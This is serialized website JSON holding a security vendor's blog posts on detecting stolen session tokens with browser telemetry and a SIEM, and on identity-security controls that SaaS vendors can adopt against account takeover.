past, writing high-fidelity detections for session token theft has been extremely challenging because there was only squishy ground to stand on: IP-based or geo-based signals are noisy and frequently inaccurate.",[],{},{"nodeType":178,"data":114246,"content":114247},{},[114248,114252,114263],{"nodeType":173,"value":114249,"marks":114250,"data":114251},"Push recently released our ",[],{},{"nodeType":1698,"data":114253,"content":114257},{"target":114254},{"sys":114255},{"id":114256,"type":317,"linkType":318},"1UMZdjyNQt4Y7NBb2wuK4L",[114258],{"nodeType":173,"value":114259,"marks":114260,"data":114262},"session token theft detection",[114261],{"type":370},{},{"nodeType":173,"value":114264,"marks":114265,"data":114266}," feature, which uses the Push browser agent to inject a unique marker into the user agent string of sessions that occur in browsers enrolled in Push.",[],{},{"nodeType":312,"data":114268,"content":114272},{"target":114269},{"sys":114270},{"id":114271,"type":317,"linkType":318},"3zQamWSaZFIbMUhQZtM2II",[],{"nodeType":178,"data":114274,"content":114275},{},[114276,114280,114289,114293,114297,114301,114306],{"nodeType":173,"value":114277,"marks":114278,"data":114279},"Things get interesting when you plug Push telemetry into Panther’s new ",[],{},{"nodeType":186,"data":114281,"content":114283},{"uri":114282},"https://docs.panther.com/detections/correlation-rules",[114284],{"nodeType":173,"value":114285,"marks":114286,"data":114288},"Correlation Rules",[114287],{"type":370},{},{"nodeType":173,"value":114290,"marks":114291,"data":114292}," feature (or perform a correlation in your other SIEM of choice). By analyzing logs from your IdP, you can identify activity from the same session that both ",[],{},{"nodeType":173,"value":208,"marks":114294,"data":114296},[114295],{"type":1646},{},{"nodeType":173,"value":114298,"marks":114299,"data":114300}," and that ",[],{},{"nodeType":173,"value":114302,"marks":114303,"data":114305},"lacks",[114304],{"type":1646},{},{"nodeType":173,"value":114307,"marks":114308,"data":114309}," the Push marker, a high-fidelity signal that a stolen session token is being used by an adversary.",[],{},{"nodeType":178,"data":114311,"content":114312},{},[114313],{"nodeType":173,"value":114314,"marks":114315,"data":114316},"“Being able to correlate high-fidelity browser telemetry data with IdP logs and even more traditional endpoint logs is a powerful enabler for our users in catching bad actor behavior fast and early,” says Dooley, Panther’s Head of Partnerships.",[],{},{"nodeType":178,"data":114318,"content":114319},{},[114320],{"nodeType":173,"value":114321,"marks":114322,"data":114323},"Check out this video demo from Joe Stanulis, solutions engineer team lead at Push, and Nicholas Hakmiller, senior engineering manager at Panther, to see how Push and Panther combine their powers to detect session token theft.",[],{},{"nodeType":312,"data":114325,"content":114329},{"target":114326},{"sys":114327},{"id":114328,"type":317,"linkType":318},"2hUt3IqTFlCMgC0jHTau58",[],{"nodeType":178,"data":114331,"content":114332},{},[114333],{"nodeType":173,"value":114334,"marks":114335,"data":114336},"As Dooley explains, “Push’s approach of generating visibility as well as security findings aligns well with Panther’s approach of centralizing customers’ security alerts but also combining multiple signals from different sources into one finding. For example, the Push agent can block phishing attacks when in Block mode, but when in Monitor mode, those findings can be sent to Panther to be correlated with other activity like unusual Okta logins to create a single alert that tells a more complete story of a user being compromised. ",[],{},{"nodeType":178,"data":114338,"content":114339},{},[114340],{"nodeType":173,"value":114341,"marks":114342,"data":114343},"“Similarly, the Push user agent string marker leaves a very visible fingerprint in logs from other systems, making it easy to incorporate this Push feature into Panther detections across a variety of log sources and use cases.”",[],{},{"nodeType":169,"data":114345,"content":114346},{},[114347],{"nodeType":173,"value":114348,"marks":114349,"data":114350},"What else can you do with Push and your SIEM?",[],{},{"nodeType":178,"data":114352,"content":114353},{},[114354],{"nodeType":173,"value":114355,"marks":114356,"data":114357},"As a browser agent, Push is uniquely positioned to provide telemetry on your identity infrastructure that you can’t easily get elsewhere. This data is a key element to stopping identity attacks and account takeover by providing the context security teams need to write detections and to perform correlations with existing log sources, such as an identity provider.",[],{},{"nodeType":178,"data":114359,"content":114360},{},[114361],{"nodeType":173,"value":114362,"marks":114363,"data":114364},"General use cases for ingesting Push data into your SIEM include:",[],{},{"nodeType":250,"data":114366,"content":114367},{},[114368,114397,114412,114427],{"nodeType":254,"data":114369,"content":114370},{},[114371],{"nodeType":178,"data":114372,"content":114373},{},[114374,114379,114383,114393],{"nodeType":173,"value":114375,"marks":114376,"data":114378},"Detecting phishing attempts",[114377],{"type":370},{},{"nodeType":173,"value":114380,"marks":114381,"data":114382}," from ",[],{},{"nodeType":1698,"data":114384,"content":114388},{"target":114385},{"sys":114386},{"id":114387,"type":317,"linkType":318},"4EfGLsD4qOkE4AoTUoL83m",[114389],{"nodeType":173,"value":114390,"marks":114391,"data":114392},"AitM phishing tools",[],{},{"nodeType":173,"value":114394,"marks":114395,"data":114396}," like Evilginx or EvilNoVNC.",[],{},{"nodeType":254,"data":114398,"content":114399},{},[114400],{"nodeType":178,"data":114401,"content":114402},{},[114403,114408],{"nodeType":173,"value":114404,"marks":114405,"data":114407},"Monitoring for suspicious activity or high-risk changes",[114406],{"type":370},{},{"nodeType":173,"value":114409,"marks":114410,"data":114411}," such as MFA method changes or reuse of corporate SSO passwords on other apps.",[],{},{"nodeType":254,"data":114413,"content":114414},{},[114415],{"nodeType":178,"data":114416,"content":114417},{},[114418,114423],{"nodeType":173,"value":114419,"marks":114420,"data":114422},"Hardening identities and flagging poor hygiene behaviors",[114421],{"type":370},{},{"nodeType":173,"value":114424,"marks":114425,"data":114426},", such as logging into SSO-protected apps with local accounts or reusing passwords across business applications.",[],{},{"nodeType":254,"data":114428,"content":114429},{},[114430],{"nodeType":178,"data":114431,"content":114432},{},[114433,114438],{"nodeType":173,"value":114434,"marks":114435,"data":114437},"Detecting the use of stolen session tokens",[114436],{"type":370},{},{"nodeType":173,"value":114439,"marks":114440,"data":114441},", indicating a compromised identity and device, as discussed earlier.",[],{},{"nodeType":169,"data":114443,"content":114444},{},[114445],{"nodeType":173,"value":71801,"marks":114446,"data":114447},[],{},{"nodeType":178,"data":114449,"content":114450},{},[114451,114455,114462],{"nodeType":173,"value":114452,"marks":114453,"data":114454},"To see Push in action, ",[],{},{"nodeType":186,"data":114456,"content":114458},{"uri":114457},"/demo/",[114459],{"nodeType":173,"value":88194,"marks":114460,"data":114461},[],{},{"nodeType":173,"value":114463,"marks":114464,"data":114465},". We’ll be happy to show you our session theft detection feature, along with how we discover all the apps your employees are using, even the ones not behind SSO, and how we detect vulnerable identities and stop identity attacks with browser-based controls.",[],{},{"nodeType":178,"data":114467,"content":114468},{},[114469,114473,114480],{"nodeType":173,"value":114470,"marks":114471,"data":114472},"For technical setup details on the Push-Panther integration, refer to the ",[],{},{"nodeType":186,"data":114474,"content":114475},{"uri":114192},[114476],{"nodeType":173,"value":114477,"marks":114478,"data":114479},"Panther documentation",[],{},{"nodeType":173,"value":1477,"marks":114481,"data":114482},[],{},"Combining the powers of Push and Panther to stop identity attacks","Push is excited to partner with Panther, bringing our unique browser telemetry to your SIEM.","2024-06-25T00:00:00.000Z","combining-the-powers-of-push-and-panther-to-stop-identity-attacks",{"items":114488},[114489,114491],{"sys":114490,"name":509},{"id":508},{"sys":114492,"name":18399},{"id":18398},{"items":114494},[114495],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":114496},{"url":2911},{"items":114498},[114499],{"fullName":2908,"firstName":2909,"jobTitle":514,"profilePicture":114500},{"url":2911},"content:blog:better-together-identity-telemetry-from-push-smart-storage-and-searches-from.json","blog/better-together-identity-telemetry-from-push-smart-storage-and-searches-from.json","blog/better-together-identity-telemetry-from-push-smart-storage-and-searches-from",{"_path":114505,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":114506,"ogImage":118,"summary":114509,"title":114520,"subtitle":118,"metaTitle":114521,"synopsis":114519,"hashTags":118,"publishedDate":114522,"slug":114523,"tagsCollection":114524,"relatedBlogPostsCollection":114530,"authorsCollection":116872,"content":116876,"_id":117214,"_type":5439,"_source":5440,"_file":117215,"_stem":117216,"_extension":5439},"/blog/2025-hipaa-rule-change",{"id":114507,"publishedAt":114508},"1DXre707DVy7nUQeuxaPvL","2025-05-29T13:49:45.186Z",{"json":114510},{"data":114511,"content":114512,"nodeType":165},{},[114513],{"data":114514,"content":114515,"nodeType":178},{},[114516],{"data":114517,"marks":114518,"value":114519,"nodeType":173},{},[],"The HIPAA Security Rule is getting a long-overdue facelift in 2025. Here's our quick overview of the key changes and how Push can help you to be compliant. ","Navigating the 2025 HIPAA Security Rule changes: What you need to know (and how Push can help)","Navigating the 2025 HIPAA Security Rule changes","2025-05-29T00:00:00.000Z","2025-hipaa-rule-change",{"items":114525},[114526,114528],{"sys":114527,"name":26137},{"id":26136},{"sys":114529,"name":26133},{"id":26132},{"items":114531},[114532,115415,115701],{"__typename":1528,"sys":114533,"content":114535,"title":115401,"synopsis":115402,"hashTags":118,"publishedDate":115403,"slug":115404,"tagsCollection":115405,"authorsCollection":115411},{"id":114534},"1VGP8VIzwMh0zjNOzU5qaq",{"json":114536},{"nodeType":165,"data":114537,"content":114538},{},[114539,114546,114553,114560,114565,114568,114576,114595,114602,114609,114616,114639,114647,114650,114658,114665,114672,114679,114686,114692,114699,114706,114739,114746,114754,114760,114767,114785,114804,114812,114830,114836,114843,114850,114883,114891,114898,114904,114911,114918,114947,114955,114975,114983,115003,115011,115018,115024,115031,115034,115042,115062,115117,115124,115131,115139,115146,115169,115176,115195,115201,115208,115214,115221,115284,115292,115312,115319,115342,115345,115352,115359,115365,115372,115389,115395],{"nodeType":178,"data":114540,"content":114541},{},[114542],{"nodeType":173,"value":114543,"marks":114544,"data":114545},"A lot happened last year in the world of identity security — particularly in terms of the attacks we’ve experienced targeting internet applications and services. With this trend certain to continue in 2025, it’s more important than ever that product vendors build products with a secure baseline of fundamental controls and safeguards.",[],{},{"nodeType":178,"data":114547,"content":114548},{},[114549],{"nodeType":173,"value":114550,"marks":114551,"data":114552},"The vast majority of the identity vulnerabilities we observe in the wild are the result of multiple auth mechanisms being attached to a single account. The more methods that are configured (or are configurable), the greater the risk that insecure identities will be created — and exploited by attackers. ",[],{},{"nodeType":178,"data":114554,"content":114555},{},[114556],{"nodeType":173,"value":114557,"marks":114558,"data":114559},"The good news is that with a coordinated response from app vendors, this surface can be significantly reduced. The bad news is that right now, we’re very far from a universal standard when it comes to how apps handle authentication and identities. ",[],{},{"nodeType":312,"data":114561,"content":114564},{"target":114562},{"sys":114563},{"id":4028,"type":317,"linkType":318},[],{"nodeType":231,"data":114566,"content":114567},{},[],{"nodeType":169,"data":114569,"content":114570},{},[114571],{"nodeType":173,"value":114572,"marks":114573,"data":114575},"Where to start?",[114574],{"type":370},{},{"nodeType":178,"data":114577,"content":114578},{},[114579,114582,114591],{"nodeType":173,"value":5039,"marks":114580,"data":114581},[],{},{"nodeType":186,"data":114583,"content":114585},{"uri":114584},"https://mvsp.dev/mvsp.en/",[114586],{"nodeType":173,"value":114587,"marks":114588,"data":114590},"Minimum Viable Secure Product (MVSP)",[114589],{"type":194},{},{"nodeType":173,"value":114592,"marks":114593,"data":114594}," initiative is a great resource for product and engineering teams that sets out essential controls that should be implemented in enterprise-ready products and services. MVSP does a fantastic job of getting to the heart of what’s important for vendor products, as compared to more general frameworks and standards like ISO and NIST that cover wider controls that should be implemented across the enterprise. ",[],{},{"nodeType":178,"data":114596,"content":114597},{},[114598],{"nodeType":173,"value":114599,"marks":114600,"data":114601},"We don’t want to reinvent the wheel, so we won’t be redoing the fundamentals already covered in MVSP. But MVSP inspired us to think – what are the vendor controls that would make a meaningful difference against the identity attacks we’re seeing in the wild? ",[],{},{"nodeType":178,"data":114603,"content":114604},{},[114605],{"nodeType":173,"value":114606,"marks":114607,"data":114608},"With better, consistent security standards, SaaS developers can close off a number of ATO techniques and generally make life much more difficult for attackers. ",[],{},{"nodeType":178,"data":114610,"content":114611},{},[114612],{"nodeType":173,"value":114613,"marks":114614,"data":114615},"We’ve identified two key areas of potential improvement which would make a material difference to ATO resilience:",[],{},{"nodeType":250,"data":114617,"content":114618},{},[114619,114629],{"nodeType":254,"data":114620,"content":114621},{},[114622],{"nodeType":178,"data":114623,"content":114624},{},[114625],{"nodeType":173,"value":114626,"marks":114627,"data":114628},"Many of the emerging TTPs could be seriously impaired (or prevented entirely) with improved authentication and identity management controls. ",[],{},{"nodeType":254,"data":114630,"content":114631},{},[114632],{"nodeType":178,"data":114633,"content":114634},{},[114635],{"nodeType":173,"value":114636,"marks":114637,"data":114638},"Detecting attacks and responding to identity breaches on third-party apps is a nightmare due to the availability of log data (or lack thereof). ",[],{},{"nodeType":178,"data":114640,"content":114641},{},[114642],{"nodeType":173,"value":114643,"marks":114644,"data":114646},"Let’s look at the changes that app vendors can make to improve the situation. ",[114645],{"type":370},{},{"nodeType":231,"data":114648,"content":114649},{},[],{"nodeType":169,"data":114651,"content":114652},{},[114653],{"nodeType":173,"value":114654,"marks":114655,"data":114657},"Provide the visibility and control to manage and harden identities",[114656],{"type":370},{},{"nodeType":178,"data":114659,"content":114660},{},[114661],{"nodeType":173,"value":114662,"marks":114663,"data":114664},"In the context of SaaS, identity security controls are your best (and in many cases, your last) defense against cyber attacks. ",[],{},{"nodeType":178,"data":114666,"content":114667},{},[114668],{"nodeType":173,"value":114669,"marks":114670,"data":114671},"Pretty much every SaaS attack involves ATO through identity-based techniques, such as phishing, credential stuffing, or session hijacking using stolen cookies. In contrast, very few involve classic vulnerability exploitation (e.g. injection vulns, cross-site scripting, etc.). ",[],{},{"nodeType":178,"data":114673,"content":114674},{},[114675],{"nodeType":173,"value":114676,"marks":114677,"data":114678},"When all an attacker needs to do is log into an app and dump the data to succeed, there isn’t much in the way of post-ATO activity to detect and respond to (even if you had the logs you need, more on this later) — which is why robust authentication controls to prevent unauthorized access are so important. ",[],{},{"nodeType":178,"data":114680,"content":114681},{},[114682],{"nodeType":173,"value":114683,"marks":114684,"data":114685},"If post-ATO activity does occur, it is often to compromise additional accounts with in-app administrative privileges as opposed to pivoting to other environments. ",[],{},{"nodeType":312,"data":114687,"content":114691},{"target":114688},{"sys":114689},{"id":114690,"type":317,"linkType":318},"3l9SxYjTtls6URgbI0NiU3",[],{"nodeType":178,"data":114693,"content":114694},{},[114695],{"nodeType":173,"value":114696,"marks":114697,"data":114698},"As you’d expect, many apps prioritize a frictionless user experience over security. This is one of the main drivers of insecure authentication implementation. Consistent implementation of identity and authentication controls would go a long way to reducing the susceptibility of apps to the majority of identity attack techniques. ",[],{},{"nodeType":178,"data":114700,"content":114701},{},[114702],{"nodeType":173,"value":114703,"marks":114704,"data":114705},"In terms of authentication and identity management, MVSP focuses on:",[],{},{"nodeType":250,"data":114707,"content":114708},{},[114709,114719,114729],{"nodeType":254,"data":114710,"content":114711},{},[114712],{"nodeType":178,"data":114713,"content":114714},{},[114715],{"nodeType":173,"value":114716,"marks":114717,"data":114718},"Providing an SSO mechanism, ",[],{},{"nodeType":254,"data":114720,"content":114721},{},[114722],{"nodeType":178,"data":114723,"content":114724},{},[114725],{"nodeType":173,"value":114726,"marks":114727,"data":114728},"Implementing a robust password policy, and ",[],{},{"nodeType":254,"data":114730,"content":114731},{},[114732],{"nodeType":178,"data":114733,"content":114734},{},[114735],{"nodeType":173,"value":114736,"marks":114737,"data":114738},"Logically separating data/functions based on the needs of a user type/group. ",[],{},{"nodeType":178,"data":114740,"content":114741},{},[114742],{"nodeType":173,"value":114743,"marks":114744,"data":114745},"We can go beyond these basic auth controls to prevent identity attacks by providing better default security configurations, and giving admins more visibility and control over identities. ",[],{},{"nodeType":235,"data":114747,"content":114748},{},[114749],{"nodeType":173,"value":114750,"marks":114751,"data":114753},"1. Allow one active login method (and require external re-verification to change to another).",[114752],{"type":370},{},{"nodeType":312,"data":114755,"content":114759},{"target":114756},{"sys":114757},{"id":114758,"type":317,"linkType":318},"65YwkaNS3LjB1vZsYQtXQH",[],{"nodeType":178,"data":114761,"content":114762},{},[114763],{"nodeType":173,"value":114764,"marks":114765,"data":114766},"There is very rarely a need for multiple authentication methods to be active for the same account at the same time. Perhaps you upgrade from a local password to OIDC or SAML — but there’s no need to have multiple SSO logins from different providers at once, and there’s no need to continue using a local password after adding an SSO method. One exception is Administrators retaining local password access to access the tenant in case SAML configuration breaks (commonly because certificates expire) but in all other cases it’s an anti-pattern to allow any user more than one auth method. ",[],{},{"nodeType":178,"data":114768,"content":114769},{},[114770,114774,114781],{"nodeType":173,"value":114771,"marks":114772,"data":114773},"We call these alternative login methods (especially when they are in addition to SAML — so e.g. local password or OIDC logins using Google or Microsoft) ",[],{},{"nodeType":186,"data":114775,"content":114776},{"uri":832},[114777],{"nodeType":173,"value":835,"marks":114778,"data":114780},[114779],{"type":194},{},{"nodeType":173,"value":114782,"marks":114783,"data":114784}," because they provide attackers with a way around a company’s chosen enterprise SSO option. ",[],{},{"nodeType":178,"data":114786,"content":114787},{},[114788,114792,114800],{"nodeType":173,"value":114789,"marks":114790,"data":114791},"This situation most commonly arises because apps automatically merge login methods. So for example, if a user normally logs in with a password, but then attempts to login using an OIDC of social login — many apps automatically merge that new login method with the existing account. This is particularly problematic when it’s done without further verification steps — leading to ",[],{},{"nodeType":186,"data":114793,"content":114794},{"uri":61709},[114795],{"nodeType":173,"value":114796,"marks":114797,"data":114799},"cross-IdP attacks",[114798],{"type":194},{},{"nodeType":173,"value":114801,"marks":114802,"data":114803},". Ideally, apps should disable the old log method when a new one is enabled, but at the very least, external verification of the change should be required (e.g. via email). ",[],{},{"nodeType":235,"data":114805,"content":114806},{},[114807],{"nodeType":173,"value":114808,"marks":114809,"data":114811},"2. Require external verification of changes to IdP configuration settings.",[114810],{"type":370},{},{"nodeType":178,"data":114813,"content":114814},{},[114815,114819,114826],{"nodeType":173,"value":114816,"marks":114817,"data":114818},"Attackers that are able to compromise one account with the level of privilege required to change the SAML settings in-app (typically an app admin), even on an app that is otherwise uninteresting or low risk – can perform an attack technique known as ",[],{},{"nodeType":186,"data":114820,"content":114821},{"uri":70029},[114822],{"nodeType":173,"value":63256,"marks":114823,"data":114825},[114824],{"type":194},{},{"nodeType":173,"value":114827,"marks":114828,"data":114829},". This can be used to direct users to authenticate to the app via an attacker-controlled IdP tenant (so e.g. an attacker’s own Okta instance or phishing page that looks like Okta/MS/Google) to capture additional credentials and facilitate further compromise of accounts. ",[],{},{"nodeType":312,"data":114831,"content":114835},{"target":114832},{"sys":114833},{"id":114834,"type":317,"linkType":318},"4YfQDIY2hhE77h2xDr9Ja",[],{"nodeType":178,"data":114837,"content":114838},{},[114839],{"nodeType":173,"value":114840,"marks":114841,"data":114842},"To mitigate this, any SAML changes should require external verification, ideally through an out-of-band method like DNS Verification. If this can’t be achieved and you need to rely on email, the request should be sent to all app admins (to increase awareness of the risky change) and come with a cooldown period before the change takes effect. This improves the chance that an attacker’s SAMLjacking attack can be intercepted before half of the victim’s workforce gets keylogged — not after!",[],{},{"nodeType":178,"data":114844,"content":114845},{},[114846],{"nodeType":173,"value":114847,"marks":114848,"data":114849},"Other viable control options include:",[],{},{"nodeType":250,"data":114851,"content":114852},{},[114853,114863,114873],{"nodeType":254,"data":114854,"content":114855},{},[114856],{"nodeType":178,"data":114857,"content":114858},{},[114859],{"nodeType":173,"value":114860,"marks":114861,"data":114862},"Once SAML is configured, ensure it can't be edited without contacting the app developer",[],{},{"nodeType":254,"data":114864,"content":114865},{},[114866],{"nodeType":178,"data":114867,"content":114868},{},[114869],{"nodeType":173,"value":114870,"marks":114871,"data":114872},"Service Provider initiated flows not enabled by default to stop attackers from hijacking logins using Home Realm Discovery for domains they don't own",[],{},{"nodeType":254,"data":114874,"content":114875},{},[114876],{"nodeType":178,"data":114877,"content":114878},{},[114879],{"nodeType":173,"value":114880,"marks":114881,"data":114882},"Disallow new signups using password or OIDC logins when a domain is connected via SAML",[],{},{"nodeType":235,"data":114884,"content":114885},{},[114886],{"nodeType":173,"value":114887,"marks":114888,"data":114890},"3. Provide admins with visibility of account authentication (login methods, MFA methods, IdPs used) and allow them to be restricted or removed. ",[114889],{"type":370},{},{"nodeType":178,"data":114892,"content":114893},{},[114894],{"nodeType":173,"value":114895,"marks":114896,"data":114897},"Many apps provide very limited information to admins about the configuration of identities within their tenant, and fewer still provide any mechanism for admins to take action if gaps or potential weak points are discovered. Some don’t even provide information about which accounts have access to the tenant at all. As a security team member this is maddening. ",[],{},{"nodeType":312,"data":114899,"content":114903},{"target":114900},{"sys":114901},{"id":114902,"type":317,"linkType":318},"5z3zNE7z9TWUJsYCmwew1S",[],{"nodeType":178,"data":114905,"content":114906},{},[114907],{"nodeType":173,"value":114908,"marks":114909,"data":114910},"It’s vital that, at the bare minimum, admins can access information (ideally in a dashboard) with the accounts, all login methods configured, MFA factors set, and the SSO methods used (specifying the IdP and protocol). All login methods should be visible to security admins, including secondary email addresses, social login connections, and so on. ",[],{},{"nodeType":178,"data":114912,"content":114913},{},[114914],{"nodeType":173,"value":114915,"marks":114916,"data":114917},"It should then also be possible to set a preferred method (e.g. only SAML from Microsoft, or OIDC from Google) and delete or disable ones that pose a risk. ",[],{},{"nodeType":178,"data":114919,"content":114920},{},[114921,114925,114932,114935,114943],{"nodeType":173,"value":114922,"marks":114923,"data":114924},"For security teams to be able to clean up insecure identities, they need to be able to make changes inside the app without requiring an action from the user. This means removing phishable MFA factors to prevent ",[],{},{"nodeType":186,"data":114926,"content":114927},{"uri":775},[114928],{"nodeType":173,"value":778,"marks":114929,"data":114931},[114930],{"type":194},{},{"nodeType":173,"value":933,"marks":114933,"data":114934},[],{},{"nodeType":186,"data":114936,"content":114937},{"uri":61157},[114938],{"nodeType":173,"value":114939,"marks":114940,"data":114942},"MFA downgrade",[114941],{"type":194},{},{"nodeType":173,"value":114944,"marks":114945,"data":114946}," attacks.  ",[],{},{"nodeType":235,"data":114948,"content":114949},{},[114950],{"nodeType":173,"value":114951,"marks":114952,"data":114954},"4. Support the use of domain-bound credentials (whether in the form of a passkey or MFA method) that are phishing resistant (FIDO key).",[114953],{"type":370},{},{"nodeType":178,"data":114956,"content":114957},{},[114958,114962,114971],{"nodeType":173,"value":114959,"marks":114960,"data":114961},"It’s no longer the case that simply having MFA is enough to stop identity attacks. The vast majority of phishing campaigns now make use of ",[],{},{"nodeType":186,"data":114963,"content":114965},{"uri":114964},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/aitm_phishing/description.md",[114966],{"nodeType":173,"value":114967,"marks":114968,"data":114970},"AitM toolkits designed to bypass MFA",[114969],{"type":194},{},{"nodeType":173,"value":114972,"marks":114973,"data":114974},". The only MFA methods considered to be phishing resistant are those using device-bound authentication methods such as passkeys/WebAuthn. However, only a handful of apps actually support these authentication methods. While the majority of SSO apps do support them, apps should provide support locally as well, particularly for B2C use-cases where enterprise SSO isn’t being used. ",[],{},{"nodeType":235,"data":114976,"content":114977},{},[114978],{"nodeType":173,"value":114979,"marks":114980,"data":114982},"5. Allow active sessions to be viewed and remotely terminated by administrators.",[114981],{"type":370},{},{"nodeType":178,"data":114984,"content":114985},{},[114986,114990,114999],{"nodeType":173,"value":114987,"marks":114988,"data":114989},"Most apps have no way of viewing valid sessions and session activity, even as an administrator. With session hijacking attacks using ",[],{},{"nodeType":186,"data":114991,"content":114993},{"uri":114992},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/session_cookie_theft/description.md",[114994],{"nodeType":173,"value":114995,"marks":114996,"data":114998},"stolen session cookies",[114997],{"type":194},{},{"nodeType":173,"value":115000,"marks":115001,"data":115002}," on the rise, being able to (at the very least) terminate sessions that are suspected to have been compromised is key to effective incident response. In an ideal world, you would be able to view the properties of the session (such as the browser, IP, location that the session is being accessed from) to identify unusual or suspicious activity, which could in turn be leveraged by SecOps teams for their detection workflows. ",[],{},{"nodeType":235,"data":115004,"content":115005},{},[115006],{"nodeType":173,"value":115007,"marks":115008,"data":115010},"6. Allow admins to prevent users with a matching domain from auto-joining a company tenant without being invited or approved by an admin, and notify when they do. ",[115009],{"type":370},{},{"nodeType":178,"data":115012,"content":115013},{},[115014],{"nodeType":173,"value":115015,"marks":115016,"data":115017},"Many apps do not provide the level of granular permissions that we’ve come to associate with enterprise cloud platforms — often because it simply isn’t necessary. This means that a lot of the time, the average user can access most, if not all of the data stored within an app. This is problematic if any user with a matching domain can join a company’s app tenant. This creates insider risk, as well as increasing the blast radius of ATO of an IdP account in terms of affected apps — it’s not just the apps they’re actively using, but any they can sign up to as well. ",[],{},{"nodeType":312,"data":115019,"content":115023},{"target":115020},{"sys":115021},{"id":115022,"type":317,"linkType":318},"SKchIQFHSWumQsORBYNs5",[],{"nodeType":178,"data":115025,"content":115026},{},[115027],{"nodeType":173,"value":115028,"marks":115029,"data":115030},"To address this, apps should allow admins to lock down their app tenant to be invite-only should they desire (and enable it by default), and at least issue email notifications to admins whenever a new user joins the company’s app tenant — prompting the admin to check that the event is expected. ",[],{},{"nodeType":231,"data":115032,"content":115033},{},[],{"nodeType":169,"data":115035,"content":115036},{},[115037],{"nodeType":173,"value":115038,"marks":115039,"data":115041},"Enable security teams to detect and respond to identity attacks",[115040],{"type":370},{},{"nodeType":178,"data":115043,"content":115044},{},[115045,115049,115058],{"nodeType":173,"value":115046,"marks":115047,"data":115048},"Security teams required to respond to incidents affecting SaaS apps are ",[],{},{"nodeType":186,"data":115050,"content":115052},{"uri":115051},"https://mayakaczorowski.com/blogs/what-sucks-in-security",[115053],{"nodeType":173,"value":115054,"marks":115055,"data":115057},"united in how painful it is",[115056],{"type":194},{},{"nodeType":173,"value":115059,"marks":115060,"data":115061},": ",[],{},{"nodeType":250,"data":115063,"content":115064},{},[115065,115087,115097,115107],{"nodeType":254,"data":115066,"content":115067},{},[115068],{"nodeType":178,"data":115069,"content":115070},{},[115071,115075,115084],{"nodeType":173,"value":115072,"marks":115073,"data":115074},"Many SaaS providers don’t offer audit logs at all (",[],{},{"nodeType":186,"data":115076,"content":115078},{"uri":115077},"https://audit-logs.tax/",[115079],{"nodeType":173,"value":115080,"marks":115081,"data":115083},"or charge extra for the privilege",[115082],{"type":194},{},{"nodeType":173,"value":60235,"marks":115085,"data":115086},[],{},{"nodeType":254,"data":115088,"content":115089},{},[115090],{"nodeType":178,"data":115091,"content":115092},{},[115093],{"nodeType":173,"value":115094,"marks":115095,"data":115096},"Even when logs are available, they might be incomplete, like missing login events, or critical pieces of information in the event needed to decide whether it’s malicious or not.",[],{},{"nodeType":254,"data":115098,"content":115099},{},[115100],{"nodeType":178,"data":115101,"content":115102},{},[115103],{"nodeType":173,"value":115104,"marks":115105,"data":115106},"The lack of standardization across tools creates ingestion challenges, with each app requiring custom development work.",[],{},{"nodeType":254,"data":115108,"content":115109},{},[115110],{"nodeType":178,"data":115111,"content":115112},{},[115113],{"nodeType":173,"value":115114,"marks":115115,"data":115116},"The logs you really need can’t always be accessed programmatically. The provider might have them, but you’ll need to put in a request – that could take hours or days to respond to. ",[],{},{"nodeType":178,"data":115118,"content":115119},{},[115120],{"nodeType":173,"value":115121,"marks":115122,"data":115123},"All of this makes it very challenging to ingest meaningful security log data from SaaS and harness it for detection and response. Hours or days is an eternity when you’re in the midst of a live incident, and is inevitably going to result in a worse outcome for the business. ",[],{},{"nodeType":178,"data":115125,"content":115126},{},[115127],{"nodeType":173,"value":115128,"marks":115129,"data":115130},"MVSP specifies that authentication events should be logged (and for how long they should be stored), but practically there is little consistency in the types of event and the fields captured. App vendors should make sure that the data points they provide (and the format that logs are provided in) can be practically used by security teams. ",[],{},{"nodeType":235,"data":115132,"content":115133},{},[115134],{"nodeType":173,"value":115135,"marks":115136,"data":115138},"7. Log detailed authentication/login information.",[115137],{"type":370},{},{"nodeType":178,"data":115140,"content":115141},{},[115142],{"nodeType":173,"value":115143,"marks":115144,"data":115145},"Authentication information is arguably the most important log source in the context of SaaS services which lack granular permissions management, because: ",[],{},{"nodeType":250,"data":115147,"content":115148},{},[115149,115159],{"nodeType":254,"data":115150,"content":115151},{},[115152],{"nodeType":178,"data":115153,"content":115154},{},[115155],{"nodeType":173,"value":115156,"marks":115157,"data":115158},"If you know a malicious user accessed the app, you can infer/assume the likely impact, and respond accordingly. ",[],{},{"nodeType":254,"data":115160,"content":115161},{},[115162],{"nodeType":178,"data":115163,"content":115164},{},[115165],{"nodeType":173,"value":115166,"marks":115167,"data":115168},"Attacker behavior in-app is often indistinguishable from typical user behavior.",[],{},{"nodeType":178,"data":115170,"content":115171},{},[115172],{"nodeType":173,"value":115173,"marks":115174,"data":115175},"This means it’s vital to understand who accessed the app, at what time, and from where.",[],{},{"nodeType":178,"data":115177,"content":115178},{},[115179,115182,115191],{"nodeType":173,"value":5039,"marks":115180,"data":115181},[],{},{"nodeType":186,"data":115183,"content":115185},{"uri":115184},"https://eventmaturitymatrix.com/#salesforce-real-time-event-monitoring-urieventstream",[115186],{"nodeType":173,"value":115187,"marks":115188,"data":115190},"SaaS Event Maturity Matrix",[115189],{"type":194},{},{"nodeType":173,"value":115192,"marks":115193,"data":115194}," provides a great starting point when looking at the availability of authentication logs across different platforms. ",[],{},{"nodeType":312,"data":115196,"content":115200},{"target":115197},{"sys":115198},{"id":115199,"type":317,"linkType":318},"4NppB8YnmXHIQjvLwx79JW",[],{"nodeType":178,"data":115202,"content":115203},{},[115204],{"nodeType":173,"value":115205,"marks":115206,"data":115207},"We recommend that all providers include the following Authentication and MFA Verification log fields:",[],{},{"nodeType":312,"data":115209,"content":115213},{"target":115210},{"sys":115211},{"id":115212,"type":317,"linkType":318},"67uAYr6RA3DIr7mUCBgzyn",[],{"nodeType":178,"data":115215,"content":115216},{},[115217],{"nodeType":173,"value":115218,"marks":115219,"data":115220},"With this level of granular information it will be much easier for security teams to reliably differentiate malicious from legitimate access, independently or when combined with other data points:",[],{},{"nodeType":250,"data":115222,"content":115223},{},[115224,115234,115244,115254,115264,115274],{"nodeType":254,"data":115225,"content":115226},{},[115227],{"nodeType":178,"data":115228,"content":115229},{},[115230],{"nodeType":173,"value":115231,"marks":115232,"data":115233},"Identify suspicious logins due to 